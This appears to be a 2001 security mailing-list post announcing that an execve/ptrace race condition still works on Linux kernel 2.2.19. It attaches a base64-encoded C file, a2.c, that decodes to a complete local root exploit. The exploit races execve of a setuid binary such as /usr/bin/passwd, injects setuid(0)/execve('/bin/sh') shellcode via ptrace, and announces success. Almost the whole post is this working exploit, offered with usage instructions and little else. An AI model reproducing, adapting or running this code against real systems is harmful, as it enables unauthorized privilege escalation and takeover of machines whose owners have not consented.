Linux Kernel 2.2.x
Date: Thu, 23 Aug 2001 18:31:30 -0400
From: Silvio Mazzaro <[email protected]>
To: [email protected]
Subject: Linux Kernel 2.2.x
--------------Boundary-00=_I8LJWBNJ4VYHMA4AZT27
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160
Hi all!!
The execve/ptrace race condition still appears to work on linux kernel
2.2.19..
Here is the exploit...
Bye,
Silvio
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iQEeBAEUAwAGBQI7hYRJAAoJEHe79juiogw+Pj0D/0rERiZzpxs8DBJVKjTcgewu
+WguYw1xXwye9bCFNZqfmJAepOls+MByzscom6s3JOXfdEUhmVfuFSQAKVBit8ou
zgAhIbYyMyh4mjE0+U6ujHupohtqtYh4nh2URX/+r+nWu9Qhvdv0OKDgGlmOsWJR
0y0zjm1eLhdRNMbNIfRrA/9JfrAy/2YrhwuDg81vjdQauUxETYc7fQuLDSlA4YKZ
ELwsG1TlTYf9ZU6YP06KdLG7YIBzp/eFAJI0KHO1/Lw5dROrQYLZ6uqxgfdcQ/Sx
pTpDw4ds7q1DdeYNPYiHefFtMFHaO5hQMGHNlHfKlfPZ9J+HO6MfI/w6dR9zQOyq
hw==
=v6Hm
-----END PGP SIGNATURE-----
--------------Boundary-00=_I8LJWBNJ4VYHMA4AZT27
Content-Type: text/x-c;
charset="iso-8859-1";
name="a2.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="a2.c"
LyogCiogZXBjczIgKGltcHJvdmVkIGJ5IGxzdCBbbGlxdWlkQGRxYy5vcmddKSAKKiAtLS0tLS0t
LSAKKiBleHBsb2l0IGZvciBleGVjdmUvcHRyYWNlIHJhY2UgY29uZGl0aW9uIGluIExpbnV4IGtl
cm5lbCB1cCB0byAyLjIuMTggCiogCiogb3JpZ2luYWxseSBieTogCiogKGMpIDIwMDEgV29qY2ll
Y2ggUHVyY3p5bnNraSAvIGNsaXBoIC8gPHdwQGVsemFic29mdC5wbD4gCiogCiogaW1wcm92ZWQg
Ynk6IAoqIGxzdCBbbGlxdWlkQGRxYy5vcmddIAoqIAoqIFRoaXMgc3Bsb2l0IGRvZXMgX25vdF8g
dXNlIGJydXRlIGZvcmNlLiBJdCBkb2VzIG5vdCBuZWVkIHRoYXQuIAoqIEl0IGRvZXMgb25seSBv
bmUgYXR0ZW10IHRvIHNwbG9pdCB0aGUgcmFjZSBjb25kaXRpb24gaW4gZXhlY3ZlLiAgCiogUGFy
ZW50IHByb2Nlc3Mgd2FpdHMgZm9yIGEgY29udGV4dC1zd2l0Y2ggdGhhdCBvY2N1ciBhZnRlciAg
CiogY2hpbGQgdGFzayBzbGVlcCBpbiBleGVjdmUuIAoqIAoqIEl0IHNob3VsZCB3b3JrIGV2ZW4g
b24gb3BlbndhbGwtcGF0Y2hlZCBrZXJuZWxzIChJIGhhdmVuJ3QgdGVzdGVkIGl0KS4gCiogCiog
Q29tcGlsZSBpdDogCiogY2MgZXBjcy5jIC1vIGVwY3MgCiogVXNhZ2U6IAoqIC4vZXBjcyBbdmlj
dGltXSAKKiAKKiBJdCBnaXZlcyBpbnN0YW50IHJvb3Qgc2hlbGwgd2l0aCBhbnkgb2YgYSBzdWlk
IGJpbmFyaWVzLiAKKiAKKiBJZiBpdCBkb2VzIG5vdCB3b3JrLCB0cnkgdXNlIHNvbWUgbWV0aG9k
cyB0byBlbnN1cmUgdGhhdCBleGVjdmUgCiogd291bGQgc2xlZXAgd2hpbGUgbG9hZGluZyBiaW5h
cnkgZmlsZSBpbnRvIG1lbW9yeSwgCiogCiogaS5lLjogY2F0IC91c3IvbGliLyogPi9kZXYvbnVs
bCAyPiYxIAoqIAoqIFRlc3RlZCBvbiBSSCA3LjAgYW5kIFJIIDYuMiAvIDIuMi4xNCAvIDIuMi4x
OCAvIDIuMi4xOG93NCAKKiBUaGlzIGV4cGxvaXQgZG9lcyBub3Qgd29yayBvbiAyLjQueCBiZWNh
dXNlIGtlcm5lbCB3b24ndCBzZXQgc3VpZCAgCiogcHJpdmlsZWdlcyBpZiB1c2VyIHB0cmFjZXMg
YSBiaW5hcnkuIAoqIEJ1dCBpdCBpcyBzdGlsbCBleHBsb2l0YWJsZSBvbiB0aGVzZSBrZXJuZWxz
LiAKKiAKKiBUaGFua3MgdG8gQnVsYmEgKGhlIG1hZGUgbWUgdG8gdGFrZSBhIGxvb2sgYXQgdGhp
cyBidWcgOykgKSAKKiBHcmVldGluZ3MgdG8gU2lnU2VndiB0ZWFtLiAKKiAKKiAtLSBkMDB0IAoq
IGltcHJvdmVkIGJ5IGxzdCBbbGlxdWlkQGRxYy5vcmddIAoqIHByb3BzIHRvIGtldmluIGZvciBt
b3N0IG9mIHRoZSB3b3JrIAoqIAoqIG5vdyB3b3JrcyBvbiBzdGFjayBub24tZXhlYyBzeXN0ZW1z
IHdpdGggc29tZSBuZWF0IHRyaWNrZXJ5IGZvciB0aGUgYXV0b21hdGVkIAoqIG1ldGhvZCwgaWUu
IG5vIG5lZWQgdG8gZmluZCB0aGUgYnNzIHNlZ21lbnQgdmlhIG9iamR1bXAgCiogCiogcGFydGlj
dWxhcmx5IGl0IG5vdyByZXdyaXRlcyB0aGUgY29kZSBpbnN0cnVjdGlvbiBzZXRzIGluIHRoZSAg
CiogZHluYW1pYyBsaW5rZXIgX3N0YXJ0IHNlZ21lbnQgYW5kIGNvbnRpbnVlcyBleGVjdXRpb24g
ZnJvbSB0aGVyZS4gCiogIAoqIGFuIGFzaWRlLCBkdWUgdG8gdGhlIGZhY3QgdGhhdCB0aGUgY29k
ZSBzZWxmLW1vZGlmaWVkLCBpdCB3b3VsZG50IHdvcmsgCiogcXVpdGUgY29ycmVjdGx5IG9uIGEg
c3RhY2sgbm9uLWV4ZWMgc3lzdGVtIHdpdGhvdXQgcGxheWluZyBkaXJlY3RseSB3aXRoIAoqIHRo
ZSBic3Mgc2VnbWVudCAoaWUgbm8gcmVncy5laXAgPSByZWdzLmVzcCBjaGFuZ2UpLiB0aGlzIGlz
IG11Y2ggbW9yZSAgCiogYXV0b21hdGVkLiBob3dldmVyLCBkbyBub3RlIHRoYXQgdGhlIHByZXZp
b3VzIHZlcnNpb24gZGlkIG5vdCB0cmlnZ2VyIHN0YWNrICAKKiBub24tZXhlYyB3YXJuaW5ncyBk
dWUgdG8gaG93IGl0IHdhcyBvcGVyYXRpbmcuIG5vdGUgdGhhdCB0aGUgcmVncy5laXAgPSByZWdz
LmVzcCAgCiogbWV0aG9kIHdpbGwgYnJlYWsgb24gc3RhY2sgbm9uLWV4ZWMgc3lzdGVtcy4gCiog
CiogYXMgYWx3YXlzLi4gZW5qb3kuIAoqIAoqLyAKCiNpbmNsdWRlIDxzdGRpby5oPiAKI2luY2x1
ZGUgPGZjbnRsLmg+IAojaW5jbHVkZSA8c3lzL3R5cGVzLmg+IAojaW5jbHVkZSA8c2lnbmFsLmg+
IAojaW5jbHVkZSA8bGludXgvdXNlci5oPiAKI2luY2x1ZGUgPHN5cy93YWl0Lmg+IAojaW5jbHVk
ZSA8bGltaXRzLmg+IAojaW5jbHVkZSA8ZXJybm8uaD4gCiNpbmNsdWRlIDxzdGRsaWIuaD4gCgoj
ZGVmaW5lIENTX1NJR05BTCBTSUdVU1IxIAojZGVmaW5lIFZJQ1RJTSAiL3Vzci9iaW4vcGFzc3dk
IiAKI2RlZmluZSBTSEVMTCAiL2Jpbi9zaCIgCgovKiAKKiBtb2RpZmllZCBzaW1wbGUgc2hlbGwg
Y29kZSB3aXRoIHNvbWUgdHJpY2tlcnkgKGhhbmQgdHdlYWtzKSAKKi8gCmNoYXIgc2hlbGxjb2Rl
W109IAoiXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwIiAKIlx4MzFceGMwXHgz
MVx4ZGJceGIwXHgxN1x4Y2RceDgwIiAvKiBzZXR1aWQoMCkgKi8gCiJceDMxXHhjMFx4YjBceDJl
XHhjZFx4ODAiIAoiXHgzMVx4YzBceDUwXHhlYlx4MTdceDhiXHgxY1x4MjQiIC8qIGV4ZWN2ZShT
SEVMTCkgKi8gCiJceDkwXHg5MFx4OTBceDg5XHhlMVx4OGRceDU0XHgyNCIgLyogbGV0cyBiZSB0
cmlja3kgKi8gCiJceDA0XHhiMFx4MGJceGNkXHg4MFx4MzFceGMwXHg4OSIgCiJceGMzXHg0MFx4
Y2RceDgwXHhlOFx4ZTRceGZmXHhmZiIgCiJceGZmIiBTSEVMTCAiXHgwMFx4MDBceDAwIiA7IC8q
IHBhZCBtZSAqLyAKCnZvbGF0aWxlIGludCBjc19kZXRlY3Rvcj0wOyAKCnZvaWQgY3Nfc2lnX2hh
bmRsZXIoaW50IHNpZykgCnsgCiAgY3NfZGV0ZWN0b3I9MTsgCn0gCgp2b2lkIGRvX3ZpY3RpbShj
aGFyICogZmlsZW5hbWUpIAp7IAogIHdoaWxlICghY3NfZGV0ZWN0b3IpIDsgCiAga2lsbChnZXRw
cGlkKCksIENTX1NJR05BTCk7IAogIGV4ZWNsKGZpbGVuYW1lLCBmaWxlbmFtZSwgTlVMTCk7IAog
IHBlcnJvcigiZXhlY2wiKTsgCiAgZXhpdCgtMSk7IAp9IAoKaW50IGNoZWNrX2V4ZWN2ZShwaWRf
dCB2aWN0aW0sIGNoYXIgKiBmaWxlbmFtZSkgCnsgCiAgY2hhciBwYXRoW1BBVEhfTUFYKzFdOyAK
ICBjaGFyIGxpbmtbUEFUSF9NQVgrMV07IAogIGludCByZXM7IAoKICBzbnByaW50ZihwYXRoLCBz
aXplb2YocGF0aCksICIvcHJvYy8laS9leGUiLCAoaW50KXZpY3RpbSk7IAogIGlmIChyZWFkbGlu
ayhwYXRoLCBsaW5rLCBzaXplb2YobGluayktMSk8MCkgeyAKICAgIHBlcnJvcigicmVhZGxpbmsi
KTsgCiAgICByZXR1cm4gLTE7IAogIH0gCgogIGxpbmtbc2l6ZW9mKGxpbmspLTFdPSdcMCc7IAog
IHJlcz0hc3RyY21wKGxpbmssIGZpbGVuYW1lKTsgCiAgaWYgKHJlcykgZnByaW50ZihzdGRlcnIs
ICJjaGlsZCBzbGVwdCBvdXRzaWRlIG9mIGV4ZWN2ZVxuIik7IAogIHJldHVybiByZXM7IAp9IAoK
aW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKiBhcmd2W10pIAp7IAogIGNoYXIgKiBmaWxlbmFtZT1W
SUNUSU07IAogIHBpZF90IHZpY3RpbTsgCiAgaW50IGVycm9yLCBpOyAKICBzdHJ1Y3QgdXNlcl9y
ZWdzX3N0cnVjdCByZWdzOyAKCiAgLyogdGFrZSBvdXIgY29tbWFuZCBhcmdzIGlmIHlvdSB3YW5u
YSBwbGF5IHdpdGggb3RoZXIgcHJvZ3MgKi8gCiAgaWYgKGFyZ2M+MSkgZmlsZW5hbWU9YXJndlsx
XTsgCgogIHNpZ25hbChDU19TSUdOQUwsIGNzX3NpZ19oYW5kbGVyKTsgCgogIHZpY3RpbT1mb3Jr
KCk7IAogIGlmICh2aWN0aW08MCkgeyAKICAgIHBlcnJvcigiZm9yazogdmljdGltIik7IAogICAg
ZXhpdCgtMSk7IAogIH0gCiAgaWYgKHZpY3RpbT09MCkgZG9fdmljdGltKGZpbGVuYW1lKTsgCgog
IGtpbGwodmljdGltLCBDU19TSUdOQUwpOyAKICB3aGlsZSAoIWNzX2RldGVjdG9yKSA7IAoKICBp
ZiAocHRyYWNlKFBUUkFDRV9BVFRBQ0gsIHZpY3RpbSkpIHsgCiAgICBwZXJyb3IoInB0cmFjZTog
UFRSQUNFX0FUVEFDSCIpOyAKICAgIGdvdG8gZXhpdDsgCiAgfSAKCiAgaWYgKGNoZWNrX2V4ZWN2
ZSh2aWN0aW0sIGZpbGVuYW1lKSkgCiAgICBnb3RvIGV4aXQ7IAoKICAodm9pZCl3YWl0cGlkKHZp
Y3RpbSwgTlVMTCwgV1VOVFJBQ0VEKTsgCiAgaWYgKHB0cmFjZShQVFJBQ0VfQ09OVCwgdmljdGlt
LCAwLCAwKSkgeyAKICAgIHBlcnJvcigicHRyYWNlOiBQVFJBQ0VfQ09OVCIpOyAKICAgIGdvdG8g
ZXhpdDsgCiAgfSAKCiAgKHZvaWQpd2FpdHBpZCh2aWN0aW0sIE5VTEwsIFdVTlRSQUNFRCk7IAoK
ICBpZiAocHRyYWNlKFBUUkFDRV9HRVRSRUdTLCB2aWN0aW0sIDAsICZyZWdzKSkgeyAKICAgIHBl
cnJvcigicHRyYWNlOiBQVFJBQ0VfR0VUUkVHUyIpOyAKICAgIGdvdG8gZXhpdDsgCiAgfSAKCiAg
LyogbWFrZSBzdXJlIHRoYXQgbGFzdCBudWxsIGlzIGluIHRoZXJlICovIAogIGZvciAoaT0wOyBp
PD1zdHJsZW4oc2hlbGxjb2RlKTsgaSs9NCkgeyAKICAgIGlmIChwdHJhY2UoUFRSQUNFX1BPS0VU
RVhULCB2aWN0aW0sIHJlZ3MuZWlwK2ksIAogICAgICAqKGludCopKHNoZWxsY29kZStpKSkpIHsg
CiAgICAgIHBlcnJvcigicHRyYWNlOiBQVFJBQ0VfUE9LRVRFWFQiKTsgCiAgICAgIGdvdG8gZXhp
dDsgCiAgICB9IAogIH0gCgogIGlmIChwdHJhY2UoUFRSQUNFX1NFVFJFR1MsIHZpY3RpbSwgMCwg
JnJlZ3MpKSB7IAogICAgcGVycm9yKCJwdHJhY2U6IFBUUkFDRV9TRVRSRUdTIik7IAogICAgZ290
byBleGl0OyAKICB9IAoKICBmcHJpbnRmKHN0ZGVyciwgImJ1ZyBleHBsb2l0ZWQgc3VjY2Vzc2Z1
bGx5LlxuZW5qb3khXG4iKTsgCgogIGlmIChwdHJhY2UoUFRSQUNFX0RFVEFDSCwgdmljdGltLCAw
LCAwKSkgeyAKICAgIHBlcnJvcigicHRyYWNlOiBQVFJBQ0VfREVUQUNIIik7IAogICAgZ290byBl
eGl0OyAKICB9IAoKICAodm9pZCl3YWl0cGlkKHZpY3RpbSwgTlVMTCwgMCk7IAogIHJldHVybiAw
OyAKCmV4aXQ6IAogIGZwcmludGYoc3RkZXJyLCAiZDBoISBlcnJvciFcbiIpOyAKICBraWxsKHZp
Y3RpbSwgU0lHS0lMTCk7IAogIHJldHVybiAtMTsgCn0gCg==
--------------Boundary-00=_I8LJWBNJ4VYHMA4AZT27--